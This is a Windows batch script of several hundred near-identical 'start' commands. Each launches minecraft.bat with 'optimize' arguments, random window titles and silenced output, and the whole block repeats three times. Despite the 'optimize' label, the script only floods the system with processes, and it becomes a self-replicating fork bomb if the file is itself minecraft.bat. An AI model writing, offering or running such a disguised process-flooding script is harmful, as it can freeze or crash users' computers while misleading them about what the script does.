start "one" minecraft.bat optimize 113 /nointerupt >NuL &
start "two" minecraft.bat optimize 114 /nointerupt >NuL &
start "three" minecraft.bat optimize 115 /nointerupt >NuL &
start "four" minecraft.bat optimize 116 /nointerupt >NuL &
start "f" minecraft.bat optimize 113 /nointerupt >NuL &
start "a" minecraft.bat optimize 114 /nointerupt >NuL &
start "thres" minecraft.bat optimize 115 /nointerupt >NuL &
start "fosr" minecraft.bat optimize 116 /nointerupt >NuL &
start "o3ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "tweo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo3r" minecraft.bat optimize 116 /nointerupt >NuL &
start "o8ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twuo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thjree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fogur" minecraft.bat optimize 116 /nointerupt >NuL &
start "one" minecraft.bat optimize 113 /nointerupt >NuL &
start "twcbbo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thdfree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foutrr" minecraft.bat optimize 116 /nointerupt >NuL &
start "o76ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "t55wo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thr67ee" minecraft.bat optimize 115 /nointerupt >NuL &
start "f675our" minecraft.bat optimize 116 /nointerupt >NuL &
start "onh5e" minecraft.bat optimize 113 /nointerupt >NuL &
start "trhwo" minecraft.bat optimize 114 /nointerupt >NuL &
start "th5hree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fohr5ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "osfd3ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twf3so" minecraft.bat optimize 114 /nointerupt >NuL &
start "ths3free" minecraft.bat optimize 115 /nointerupt >NuL &
start "fof3sur" minecraft.bat optimize 116 /nointerupt >NuL &
start "okjhne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twhjko" minecraft.bat optimize 114 /nointerupt >NuL &
start "thkjhree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foughr" minecraft.bat optimize 116 /nointerupt >NuL &
start "og434gne" minecraft.bat optimize 113 /nointerupt >NuL &
start "tg4334gdfwo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrdfg43ee" minecraft.bat optimize 115 /nointerupt >NuL &
start "foucvbtrr" minecraft.bat optimize 116 /nointerupt >NuL &
start "on4grde" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw2do" minecraft.bat optimize 114 /nointerupt >NuL &
start "thgfdree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foj76ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "ozxcane" minecraft.bat optimize 113 /nointerupt >NuL &
start "twascxzo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thcvcxree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foubvcfr" minecraft.bat optimize 116 /nointerupt >NuL &
start "onggfddfge" minecraft.bat optimize 113 /nointerupt >NuL &
start "twdfggfdo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thgfddfggfdree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fodfggfdur" minecraft.bat optimize 116 /nointerupt >NuL &
start "o23vne" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw432vo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thv43trhree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo546fur" minecraft.bat optimize 116 /nointerupt >NuL &
start "o234fsdne" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw236do" minecraft.bat optimize 114 /nointerupt >NuL &
start "thr234dfsee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fouf342r" minecraft.bat optimize 116 /nointerupt >NuL &
start "on987ke" minecraft.bat optimize 113 /nointerupt >NuL &
start "tkjh7wo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thr7k6yukee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fou65hgjr" minecraft.bat optimize 116 /nointerupt >NuL &
start "oncxve" minecraft.bat optimize 113 /nointerupt >NuL &
start "twvcxo" minecraft.bat optimize 114 /nointerupt >NuL &
start "th433gree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foug43xr" minecraft.bat optimize 116 /nointerupt >NuL &
start "on987e" minecraft.bat optimize 113 /nointerupt >NuL &
start "twkljlo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrkj8ee" minecraft.bat optimize 115 /nointerupt >NuL &
start "foul87jr" minecraft.bat optimize 116 /nointerupt >NuL &
start "oasd2ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "ad2two" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrd2aee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo654fgdur" minecraft.bat optimize 116 /nointerupt >NuL &
start "oncvx4e" minecraft.bat optimize 113 /nointerupt >NuL &
start "twvcx4o" minecraft.bat optimize 114 /nointerupt >NuL &
start "thf32ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fouf546r" minecraft.bat optimize 116 /nointerupt >NuL &
start "o32153ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "t38453wo" minecraft.bat optimize 114 /nointerupt >NuL &
start "th5412ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fou351r" minecraft.bat optimize 116 /nointerupt >NuL &
start "on455he" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw65bo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thb65bree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fovcxvrur" minecraft.bat optimize 116 /nointerupt >NuL &
start "o4543ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twfdbo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrvcvbhee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fou7854r" minecraft.bat optimize 116 /nointerupt >NuL &
start "ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "to" minecraft.bat optimize 114 /nointerupt >NuL &
start "thee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fur" minecraft.bat optimize 116 /nointerupt >NuL &
start "f4" minecraft.bat optimize 113 /nointerupt >NuL &
start "o432ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twr32o" minecraft.bat optimize 114 /nointerupt >NuL &
start "thr32free" minecraft.bat optimize 115 /nointerupt >NuL &
start "fofdsfur" minecraft.bat optimize 116 /nointerupt >NuL &
start "fxcvf" minecraft.bat optimize 113 /nointerupt >NuL &
start "on32ce" minecraft.bat optimize 113 /nointerupt >NuL &
start "two" minecraft.bat optimize 114 /nointerupt >NuL &
start "t5c23hree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo2c3ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "f554hgf" minecraft.bat optimize 113 /nointerupt >NuL &
start "ongffsdfgdfe" minecraft.bat optimize 113 /nointerupt >NuL &
start "twfghhgffgho" minecraft.bat optimize 114 /nointerupt >NuL &
start "thfgnngffree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fogfgfnnur" minecraft.bat optimize 116 /nointerupt >NuL &
start "fnfgh" minecraft.bat optimize 113 /nointerupt >NuL &
start "on23455432e" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw2345543225423o" minecraft.bat optimize 114 /nointerupt >NuL &
start "th3455432345ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo544432345ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "542322345f" minecraft.bat optimize 113 /nointerupt >NuL &
start "onbb537be" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw76b454b567o" minecraft.bat optimize 114 /nointerupt >NuL &
start "th7b654454567bree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fob76544ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "fb7645" minecraft.bat optimize 113 /nointerupt >NuL &
start "onregtrebgfde" minecraft.bat optimize 113 /nointerupt >NuL &
start "twsdggfso" minecraft.bat optimize 114 /nointerupt >NuL &
start "thhtdfghree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foh65ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "fytr6u65" minecraft.bat optimize 113 /nointerupt >NuL &
start "on235432ge" minecraft.bat optimize 113 /nointerupt >NuL &
start "twv23665v2o" minecraft.bat optimize 114 /nointerupt >NuL &
start "th6v542245v6ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fouv6425r" minecraft.bat optimize 116 /nointerupt >NuL &
start "fsdgsrf876" minecraft.bat optimize 113 /nointerupt >NuL &
start "o0987986ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "t4678wo" minecraft.bat optimize 114 /nointerupt >NuL &
start "th856ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fou8765nr" minecraft.bat optimize 116 /nointerupt >NuL &
start "f53b6v" minecraft.bat optimize 113 /nointerupt >NuL &
start "one" minecraft.bat optimize 113 /nointerupt >NuL &
start "two" minecraft.bat optimize 114 /nointerupt >NuL &
start "three" minecraft.bat optimize 115 /nointerupt >NuL &
start "four" minecraft.bat optimize 116 /nointerupt >NuL &
start "f" minecraft.bat optimize 113 /nointerupt >NuL &
start "a" minecraft.bat optimize 114 /nointerupt >NuL &
start "thres" minecraft.bat optimize 115 /nointerupt >NuL &
start "fosr" minecraft.bat optimize 116 /nointerupt >NuL &
start "o3ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "tweo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo3r" minecraft.bat optimize 116 /nointerupt >NuL &
start "o8ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twuo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thjree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fogur" minecraft.bat optimize 116 /nointerupt >NuL &
start "one" minecraft.bat optimize 113 /nointerupt >NuL &
start "twcbbo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thdfree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foutrr" minecraft.bat optimize 116 /nointerupt >NuL &
start "o76ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "t55wo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thr67ee" minecraft.bat optimize 115 /nointerupt >NuL &
start "f675our" minecraft.bat optimize 116 /nointerupt >NuL &
start "onh5e" minecraft.bat optimize 113 /nointerupt >NuL &
start "trhwo" minecraft.bat optimize 114 /nointerupt >NuL &
start "th5hree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fohr5ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "osfd3ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twf3so" minecraft.bat optimize 114 /nointerupt >NuL &
start "ths3free" minecraft.bat optimize 115 /nointerupt >NuL &
start "fof3sur" minecraft.bat optimize 116 /nointerupt >NuL &
start "okjhne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twhjko" minecraft.bat optimize 114 /nointerupt >NuL &
start "thkjhree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foughr" minecraft.bat optimize 116 /nointerupt >NuL &
start "og434gne" minecraft.bat optimize 113 /nointerupt >NuL &
start "tg4334gdfwo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrdfg43ee" minecraft.bat optimize 115 /nointerupt >NuL &
start "foucvbtrr" minecraft.bat optimize 116 /nointerupt >NuL &
start "on4grde" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw2do" minecraft.bat optimize 114 /nointerupt >NuL &
start "thgfdree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foj76ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "ozxcane" minecraft.bat optimize 113 /nointerupt >NuL &
start "twascxzo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thcvcxree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foubvcfr" minecraft.bat optimize 116 /nointerupt >NuL &
start "onggfddfge" minecraft.bat optimize 113 /nointerupt >NuL &
start "twdfggfdo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thgfddfggfdree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fodfggfdur" minecraft.bat optimize 116 /nointerupt >NuL &
start "o23vne" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw432vo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thv43trhree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo546fur" minecraft.bat optimize 116 /nointerupt >NuL &
start "o234fsdne" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw236do" minecraft.bat optimize 114 /nointerupt >NuL &
start "thr234dfsee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fouf342r" minecraft.bat optimize 116 /nointerupt >NuL &
start "on987ke" minecraft.bat optimize 113 /nointerupt >NuL &
start "tkjh7wo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thr7k6yukee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fou65hgjr" minecraft.bat optimize 116 /nointerupt >NuL &
start "oncxve" minecraft.bat optimize 113 /nointerupt >NuL &
start "twvcxo" minecraft.bat optimize 114 /nointerupt >NuL &
start "th433gree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foug43xr" minecraft.bat optimize 116 /nointerupt >NuL &
start "on987e" minecraft.bat optimize 113 /nointerupt >NuL &
start "twkljlo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrkj8ee" minecraft.bat optimize 115 /nointerupt >NuL &
start "foul87jr" minecraft.bat optimize 116 /nointerupt >NuL &
start "oasd2ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "ad2two" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrd2aee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo654fgdur" minecraft.bat optimize 116 /nointerupt >NuL &
start "oncvx4e" minecraft.bat optimize 113 /nointerupt >NuL &
start "twvcx4o" minecraft.bat optimize 114 /nointerupt >NuL &
start "thf32ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fouf546r" minecraft.bat optimize 116 /nointerupt >NuL &
start "o32153ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "t38453wo" minecraft.bat optimize 114 /nointerupt >NuL &
start "th5412ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fou351r" minecraft.bat optimize 116 /nointerupt >NuL &
start "on455he" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw65bo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thb65bree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fovcxvrur" minecraft.bat optimize 116 /nointerupt >NuL &
start "o4543ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twfdbo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrvcvbhee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fou7854r" minecraft.bat optimize 116 /nointerupt >NuL &
start "ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "to" minecraft.bat optimize 114 /nointerupt >NuL &
start "thee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fur" minecraft.bat optimize 116 /nointerupt >NuL &
start "f4" minecraft.bat optimize 113 /nointerupt >NuL &
start "o432ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twr32o" minecraft.bat optimize 114 /nointerupt >NuL &
start "thr32free" minecraft.bat optimize 115 /nointerupt >NuL &
start "fofdsfur" minecraft.bat optimize 116 /nointerupt >NuL &
start "fxcvf" minecraft.bat optimize 113 /nointerupt >NuL &
start "on32ce" minecraft.bat optimize 113 /nointerupt >NuL &
start "two" minecraft.bat optimize 114 /nointerupt >NuL &
start "t5c23hree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo2c3ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "f554hgf" minecraft.bat optimize 113 /nointerupt >NuL &
start "ongffsdfgdfe" minecraft.bat optimize 113 /nointerupt >NuL &
start "twfghhgffgho" minecraft.bat optimize 114 /nointerupt >NuL &
start "thfgnngffree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fogfgfnnur" minecraft.bat optimize 116 /nointerupt >NuL &
start "fnfgh" minecraft.bat optimize 113 /nointerupt >NuL &
start "on23455432e" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw2345543225423o" minecraft.bat optimize 114 /nointerupt >NuL &
start "th3455432345ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo544432345ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "542322345f" minecraft.bat optimize 113 /nointerupt >NuL &
start "onbb537be" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw76b454b567o" minecraft.bat optimize 114 /nointerupt >NuL &
start "th7b654454567bree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fob76544ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "fb7645" minecraft.bat optimize 113 /nointerupt >NuL &
start "onregtrebgfde" minecraft.bat optimize 113 /nointerupt >NuL &
start "twsdggfso" minecraft.bat optimize 114 /nointerupt >NuL &
start "thhtdfghree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foh65ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "fytr6u65" minecraft.bat optimize 113 /nointerupt >NuL &
start "on235432ge" minecraft.bat optimize 113 /nointerupt >NuL &
start "twv23665v2o" minecraft.bat optimize 114 /nointerupt >NuL &
start "th6v542245v6ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fouv6425r" minecraft.bat optimize 116 /nointerupt >NuL &
start "fsdgsrf876" minecraft.bat optimize 113 /nointerupt >NuL &
start "o0987986ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "t4678wo" minecraft.bat optimize 114 /nointerupt >NuL &
start "th856ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fou8765nr" minecraft.bat optimize 116 /nointerupt >NuL &
start "f53b6v" minecraft.bat optimize 113 /nointerupt >NuL &
start "one" minecraft.bat optimize 113 /nointerupt >NuL &
start "two" minecraft.bat optimize 114 /nointerupt >NuL &
start "three" minecraft.bat optimize 115 /nointerupt >NuL &
start "four" minecraft.bat optimize 116 /nointerupt >NuL &
start "f" minecraft.bat optimize 113 /nointerupt >NuL &
start "a" minecraft.bat optimize 114 /nointerupt >NuL &
start "thres" minecraft.bat optimize 115 /nointerupt >NuL &
start "fosr" minecraft.bat optimize 116 /nointerupt >NuL &
start "o3ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "tweo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo3r" minecraft.bat optimize 116 /nointerupt >NuL &
start "o8ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twuo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thjree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fogur" minecraft.bat optimize 116 /nointerupt >NuL &
start "one" minecraft.bat optimize 113 /nointerupt >NuL &
start "twcbbo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thdfree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foutrr" minecraft.bat optimize 116 /nointerupt >NuL &
start "o76ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "t55wo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thr67ee" minecraft.bat optimize 115 /nointerupt >NuL &
start "f675our" minecraft.bat optimize 116 /nointerupt >NuL &
start "onh5e" minecraft.bat optimize 113 /nointerupt >NuL &
start "trhwo" minecraft.bat optimize 114 /nointerupt >NuL &
start "th5hree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fohr5ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "osfd3ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twf3so" minecraft.bat optimize 114 /nointerupt >NuL &
start "ths3free" minecraft.bat optimize 115 /nointerupt >NuL &
start "fof3sur" minecraft.bat optimize 116 /nointerupt >NuL &
start "okjhne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twhjko" minecraft.bat optimize 114 /nointerupt >NuL &
start "thkjhree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foughr" minecraft.bat optimize 116 /nointerupt >NuL &
start "og434gne" minecraft.bat optimize 113 /nointerupt >NuL &
start "tg4334gdfwo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrdfg43ee" minecraft.bat optimize 115 /nointerupt >NuL &
start "foucvbtrr" minecraft.bat optimize 116 /nointerupt >NuL &
start "on4grde" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw2do" minecraft.bat optimize 114 /nointerupt >NuL &
start "thgfdree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foj76ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "ozxcane" minecraft.bat optimize 113 /nointerupt >NuL &
start "twascxzo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thcvcxree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foubvcfr" minecraft.bat optimize 116 /nointerupt >NuL &
start "onggfddfge" minecraft.bat optimize 113 /nointerupt >NuL &
start "twdfggfdo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thgfddfggfdree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fodfggfdur" minecraft.bat optimize 116 /nointerupt >NuL &
start "o23vne" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw432vo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thv43trhree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo546fur" minecraft.bat optimize 116 /nointerupt >NuL &
start "o234fsdne" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw236do" minecraft.bat optimize 114 /nointerupt >NuL &
start "thr234dfsee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fouf342r" minecraft.bat optimize 116 /nointerupt >NuL &
start "on987ke" minecraft.bat optimize 113 /nointerupt >NuL &
start "tkjh7wo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thr7k6yukee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fou65hgjr" minecraft.bat optimize 116 /nointerupt >NuL &
start "oncxve" minecraft.bat optimize 113 /nointerupt >NuL &
start "twvcxo" minecraft.bat optimize 114 /nointerupt >NuL &
start "th433gree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foug43xr" minecraft.bat optimize 116 /nointerupt >NuL &
start "on987e" minecraft.bat optimize 113 /nointerupt >NuL &
start "twkljlo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrkj8ee" minecraft.bat optimize 115 /nointerupt >NuL &
start "foul87jr" minecraft.bat optimize 116 /nointerupt >NuL &
start "oasd2ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "ad2two" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrd2aee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo654fgdur" minecraft.bat optimize 116 /nointerupt >NuL &
start "oncvx4e" minecraft.bat optimize 113 /nointerupt >NuL &
start "twvcx4o" minecraft.bat optimize 114 /nointerupt >NuL &
start "thf32ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fouf546r" minecraft.bat optimize 116 /nointerupt >NuL &
start "o32153ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "t38453wo" minecraft.bat optimize 114 /nointerupt >NuL &
start "th5412ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fou351r" minecraft.bat optimize 116 /nointerupt >NuL &
start "on455he" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw65bo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thb65bree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fovcxvrur" minecraft.bat optimize 116 /nointerupt >NuL &
start "o4543ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twfdbo" minecraft.bat optimize 114 /nointerupt >NuL &
start "thrvcvbhee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fou7854r" minecraft.bat optimize 116 /nointerupt >NuL &
start "ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "to" minecraft.bat optimize 114 /nointerupt >NuL &
start "thee" minecraft.bat optimize 115 /nointerupt >NuL &
start "fur" minecraft.bat optimize 116 /nointerupt >NuL &
start "f4" minecraft.bat optimize 113 /nointerupt >NuL &
start "o432ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "twr32o" minecraft.bat optimize 114 /nointerupt >NuL &
start "thr32free" minecraft.bat optimize 115 /nointerupt >NuL &
start "fofdsfur" minecraft.bat optimize 116 /nointerupt >NuL &
start "fxcvf" minecraft.bat optimize 113 /nointerupt >NuL &
start "on32ce" minecraft.bat optimize 113 /nointerupt >NuL &
start "two" minecraft.bat optimize 114 /nointerupt >NuL &
start "t5c23hree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo2c3ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "f554hgf" minecraft.bat optimize 113 /nointerupt >NuL &
start "ongffsdfgdfe" minecraft.bat optimize 113 /nointerupt >NuL &
start "twfghhgffgho" minecraft.bat optimize 114 /nointerupt >NuL &
start "thfgnngffree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fogfgfnnur" minecraft.bat optimize 116 /nointerupt >NuL &
start "fnfgh" minecraft.bat optimize 113 /nointerupt >NuL &
start "on23455432e" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw2345543225423o" minecraft.bat optimize 114 /nointerupt >NuL &
start "th3455432345ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fo544432345ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "542322345f" minecraft.bat optimize 113 /nointerupt >NuL &
start "onbb537be" minecraft.bat optimize 113 /nointerupt >NuL &
start "tw76b454b567o" minecraft.bat optimize 114 /nointerupt >NuL &
start "th7b654454567bree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fob76544ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "fb7645" minecraft.bat optimize 113 /nointerupt >NuL &
start "onregtrebgfde" minecraft.bat optimize 113 /nointerupt >NuL &
start "twsdggfso" minecraft.bat optimize 114 /nointerupt >NuL &
start "thhtdfghree" minecraft.bat optimize 115 /nointerupt >NuL &
start "foh65ur" minecraft.bat optimize 116 /nointerupt >NuL &
start "fytr6u65" minecraft.bat optimize 113 /nointerupt >NuL &
start "on235432ge" minecraft.bat optimize 113 /nointerupt >NuL &
start "twv23665v2o" minecraft.bat optimize 114 /nointerupt >NuL &
start "th6v542245v6ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fouv6425r" minecraft.bat optimize 116 /nointerupt >NuL &
start "fsdgsrf876" minecraft.bat optimize 113 /nointerupt >NuL &
start "o0987986ne" minecraft.bat optimize 113 /nointerupt >NuL &
start "t4678wo" minecraft.bat optimize 114 /nointerupt >NuL &
start "th856ree" minecraft.bat optimize 115 /nointerupt >NuL &
start "fou8765nr" minecraft.bat optimize 116 /nointerupt >NuL &
start "f53b6v" minecraft.bat optimize 113 /nointerupt >NuL &